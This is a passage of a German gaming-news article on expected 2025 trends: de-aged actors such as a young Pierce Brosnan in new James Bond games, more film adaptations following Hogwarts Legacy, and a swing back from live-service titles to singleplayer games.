<p>Mithilfe von Photogrammetrie, Machine Learning und KI-Algorithmen, die altes Footage des jungen Harrison Ford in 8K verwandelt hat, wurden 25 Minuten maximaler Nostalgie-Faktor geschaffen. Es ist technologische Magie, die uns alte Helden zurückbringen kann. So sehr wir Harrison Ford lieben, er ist eben nicht mehr der Held unserer Kindheit.</p>



<p>Und das ist auch völlig normal – wir alle können dankbar sein, wenn wir mit über 80 Jahren noch so fit sind. Er lebt auf einer Ranch und reitet jeden Tag auf seinen Pferden, das hält jung. </p>



<p>Doch was wäre denn, wenn Hollywood und Spielestudios diese De-aging-Technologie nutzen, um Sean Connery, Roger Moore und den Bond aller Bonds Pierce Brosnan in ihrer Blütezeit zurückzuholen? </p>



<p>Machine Games ist genau das gerade mit dem Spiel <a href="https://www.pcwelt.de/article/2554742/indiana-jones-und-der-grosse-kreis-test-review.html" target="_blank" rel="noreferrer noopener">Indiana Jones und der große Kreis</a> gelungen – ihr Indy ist nahezu 1:1 der junge Harrison Ford, es ist der Hammer. Brosnan ist auch heute noch ein fantastischer Schauspieler, er könnte seinem Bond zumindest seine Stimme leihen.</p>



<p><strong>Überblick:</strong> <a href="https://www.pcwelt.de/article/2519250/indiana-jones-und-der-grosse-kreis-preview.html" target="_blank" rel="noreferrer noopener">Indiana Jones und der große Kreis: Das bessere Uncharted?</a></p>



<p>Aber Pierce Brosnan hat noch nie im Motion-Capture-Anzug gespielt für ein neues James-Bond-Game. Wie fantastisch geeignet wäre ein Film wie <em>James Bond: Der Morgen stirbt nie</em>, in der der irre Medien-Mogul Elliot Carver mit einem Stealth-Kriegsschiff die britische und amerikanische Navy angreift, um es in einen Blockbuster für PS5, Xbox Series X und den PC zu verwandeln.</p>



<p>Es gibt zwar ein paar Videogames mit Brosnan als Bond wie das famose Nightfire, aber das wurde ursprünglich für die Playstation 2 entwickelt. Wie wäre es mit einem Unreal-Engine-5-Remake, bei dem 007 richtig lebensecht rüberkommt dank dieser De-aging-Technologie?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569903","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Ein neues Bond-Spiel mit einem virtuell verj\u00fcngten Pierce Brosnan? Wir w\u00e4ren sofort dabei. Es waren die besseren Filme \u2013 mit viel mehr Gadgets, wilden Stunts und insgesamt h\u00f6herem Spa\u00dffaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert.","alt":"Ein neues Bond-Spiel mit einem virtuell verj\u00fcngten Pierce Brosnan? Wir w\u00e4ren sofort dabei. Es waren die besseren Filme \u2013 mit viel mehr Gadgets, wilden Stunts und insgesamt h\u00f6herem Spa\u00dffaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert." class="wp-image-2569903" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert.</p>
</figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<p>Und weil die Connery-Bond-Ära von den frühen 60ern bis in die 80er reichte, gibt es von ihm nur ein einziges Videospiel: <em>From Russia with Love</em> (Liebesgrüße aus Moskau).</p>



<p>Gerade erst gingen erste Szenen eines möglichen LEGO-James-Bond-Spiels viral, in dem TT Games aus England die berühmtesten Szenen aller 24 Bond-Filme, etwa den Lauf über die Krokodile in <em>James Bond 007: Leben und Sterben lassen</em>, in LEGO-Videospiel-Form wieder hat auferstehen lassen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Und auf Amazon Prime durften wir alle James-Bond-Filme von Sean Connery über George Lazenby, Roger Moore und Timothy Dalton bis zu Pierce Brosnan auf Amazon Prime als 4K-Remaster erleben. Es wird Zeit, ihnen die Games zu widmen, die sie verdient haben.</p>



<p><strong>Ein Muss für Bond-Fans:</strong> <a href="https://www.amazon.de/James-Bond-Die-Jubil%C3%A4ums-Collection-Blu-ray/dp/B00DRYZDSK" target="_blank" rel="noreferrer noopener">Alle 24 James-Bond-Filme als Blu-ray Collection</a></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569915","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: F\u00fcr die Sean-Connery-\u00c4ra gibt\u2019s nur ein einziges Spiel - From Russia with Love \/\/ Liebesgr\u00fc\u00dfe aus Moskau. Ein neues Game w\u00e4re auch die Chance den Sexappeal der alten Bonds zur\u00fcckzubringen.","alt":"F\u00fcr die Sean-Connery-\u00c4ra gibt\u2019s nur ein einziges Spiel - From Russia with Love \/\/ Liebesgr\u00fc\u00dfe aus Moskau. Ein neues Game w\u00e4re auch die Chance den Sexappeal der alten Bonds zur\u00fcckzubringen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel - From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance den Sexappeal der alten Bonds zurückzubringen." class="wp-image-2569915" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=300%2C163&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=768%2C416&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=1200%2C650&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=1536%2C832&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=2048%2C1110&amp;quality=50&amp;strip=all 2048w" width="1200" height="650" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel - From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance den Sexappeal der alten Bonds zurückzubringen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel – From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance, den Sexappeal der alten Bonds zurückzubringen.</p></figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<h2 class="wp-block-heading toc">Trend 2: Mehr Filmadaptionen</h2>



<p>Wonder Woman und The Dark Knight als Singleplayer-Epos; Aquaman als majestätische Unterwasser-Open-World: Nach dem Mega-Erfolg von <a href="https://www.amazon.de/Hogwarts-Legacy-for-PlayStation-4/dp/B09W4GVQBV/" target="_blank" rel="noreferrer noopener">Hogwarts Legacy</a> dürfte Warner 2025 mehr Filmwelten auf PC, Xbox Series und PS5 bringen</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569917","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosph\u00e4re wohlig an die brillanten Filme mit Gal Gadot.","alt":"Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosph\u00e4re wohlig an die brillanten Filme mit Gal Gadot."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot." class="wp-image-2569917" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=300%2C171&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=768%2C439&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=1200%2C686&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=1536%2C878&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_06.jpg?resize=2048%2C1170&amp;quality=50&amp;strip=all 2048w" width="1200" height="686" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosphäre wohlig an die brillanten Filme mit Gal Gadot.</p>
</figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<p>David Zaslav, CEO von Warner Bros Entertainment, zeigte sich sichtlich überrascht, dass <em>Hogwarts Legacy</em> weit über Erwartungen performt hat mit 30 Millionen verkauften Spielen und über einer Milliarde US-Dollar Umsatz.</p>



<p>Genauer gesagt hat <em>Hogwarts Legacy</em> Warners Aktienkurs 2023 gerettet, nachdem diese mit <em>Shazam: Fury of the Gods</em> (Kosten: 125M US-Dollar; eingespielt 133M),<em> The Flash</em> (Kosten: 200 Millionen US-Dollar; eingespielt 271M) und <em>Blue Beetle</em> (Kosten: 120M US-Dollar; eingespielt 130M) gleich drei Superhelden-Filme hatten, die wenig oder gar kein Geld verdient haben.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Die Gamesbranche kann die größten Probleme von Hollywood lösen. Was ist Hollywoods größtes Problem? <strong>Ihre Stars haben oft keine Lust mehr.</strong></p>



<p>Daniel Radcliffe hat sich schauspielerisch in eine andere Richtung entwickelt, und Emma Watson ist ein gefeiertes Model und stark involviert in ihre Arbeit für die United Nations. „Fragt mich 2027 nochmal“, sagte sie kürzlich Vanity Fair auf die Frage, ob sie nochmal Hermine spielen würde.</p>



<p>Großer Film? Vielleicht. Großes Spiel? Könnte schwieriger werden. </p>



<p><a href="https://www.amazon.de/Hogwarts-Legacy-for-PlayStation-4/dp/B09W4GVQBV/" target="_blank" rel="noreferrer noopener">Hogwarts Legacy</a> hat aber gezeigt, dass Harry Potter auch ohne seine Stars funktioniert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569919","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. H\u00e4tten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht.","alt":"Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. H\u00e4tten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht." class="wp-image-2569919" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=300%2C156&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=768%2C401&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=1200%2C626&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=1536%2C801&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_07.jpeg?resize=2048%2C1068&amp;quality=50&amp;strip=all 2048w" width="1200" height="626" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Hogwarts Legacy hat bewiesen, dass ein talentiertes Team, welches die Vorlage liebt, auch Harry Potter ohne seine Stars inszenieren kann. Hätten wir gerne Emma Watson und Daniel Radcliff in Spielen? Auf jeden Fall. Aber die wollen nicht.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>J.K. Rowling hat jeden Zentimeter von Hogwarts in ihren Büchern in einem Detailgrad beschrieben, der bereits die Filme zu so zauberhaften Welten geformt haben, was sich sehr gut in ein Videospiel adaptieren ließ. </p>



<p>„Wir werden uns im Gaming auf unsere größten Franchises fokussieren: <em>Batman, Game of Thrones, Hogwarts Legacy, Mortal Kombat</em> und ein paar andere Überraschungen aus dem DC-Universum“, verriet Warners CEO in einem Investoren-Call. <em>Hogwarts Legacy 2</em> und <em>Wonder Woman – The Game</em> sind bereits in Entwicklung.</p>



<p><strong>Game of Thrones: Kingsroad</strong> soll eine Welle von Triple-A-Spielen rund um Jon Snow, Deanerys Tagaryen und Cersei Lannister lostreten:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Die Concept Arts von <em>Wonder Woman</em> spiegeln wundervoll die Atmosphäre und Stil der Filme mit Gal Gadot wider, zeigen das Lasso der Wahrheit sowie Kämpfe gegen Tiger-Bestien in der Heimat der Amazonen Themyscira.</p>



<p>Und Rocksteady kehrt nach <em>Suicide Squad</em> zu Batman zurück – es sieht so aus, als würde die gesamte The-Dark-Knight-Trilogie von Christopher Nolan in ein Singleplayer-Epos gegossen.</p>



<p>Wir könnten uns bei den Überraschungskandidaten auch sehr gut ein <em>Aquaman – The Game</em> vorstellen. Gerade dieses magische Unterwasser-Königreich mit Haien, auf denen wir in die Schlacht reiten, würde sich für einen Open-World-Blockbuster gerade zu aufdrängen!</p>



<h2 class="wp-block-heading toc">Trend 3: Wieder mehr Singleplayer</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569923","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft gro\u00dfartig, wie hier in einem Artwork f\u00fcr Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind f\u00fcr einen Playstation-Blockbuster.","alt":"Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft gro\u00dfartig, wie hier in einem Artwork f\u00fcr Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind f\u00fcr einen Playstation-Blockbuster."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster." class="wp-image-2569923" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=768%2C431&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1200%2C673&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1536%2C862&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_08.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="673" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Games as a Service bleibt ein schwieriges Thema: Konzeptionell wirkt das oft großartig, wie hier in einem Artwork für Spider-Man The Great Web. Der Multiplayer-Fokus schadet aber meist Geschichte und Heldenreise, die zentral sind für einen Playstation-Blockbuster.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Gaming-CEOs lieben es, Trends zu folgen: 2022 druckte Epic Games mit <em>Fortnite </em>Geld, unglaubliche 4 Milliarden US-Dollar Umsatz. Entsprechend wollte jeder sein eigenes Fortnite.</p>



<p>Die Rechnung ist nicht aufgegangen und hatte unschöne Folgen: <strong>Concord </strong>ist nicht einfach nur gefloppt, es hat 200 Arbeitsplätze gekostet, weil das Studio direkt geschlossen wurde.</p>



<p><a href="https://www.pcwelt.de/article/2473833/concord-was-ist-bei-sonys-mega-shooter-schiefgelaufen.html" target="_blank" rel="noreferrer noopener">Concord: Was ist bei Sonys Mega-Shooter schiefgelaufen?</a></p>



<p>Und Ubisoft ist mit<strong> Skull &amp; Bones</strong> baden gegangen (der Steam-Peak lag im August bei 2615 gleichzeitigen Spielern; aktuell sind es noch 244) und sogar das ziemlich großartige <strong>XDefiance </strong>von Call-of-Duty-Entwicklern wird 2025 offline gehen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569926","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte.","alt":"Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte." class="wp-image-2569926" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?quality=50&amp;strip=all 1280w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=768%2C433&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=1200%2C677&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_09.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="677" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Suicide Squad: Kill the Justice League zeigt, warum Games-as-Service so unbeliebt ist. Die Story ist klasse, die Open-World auf Rocksteady-Niveau. Aber das Gameplay auf Level-Grind ausgelegt, weil Warner Skins verkaufen wollte." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
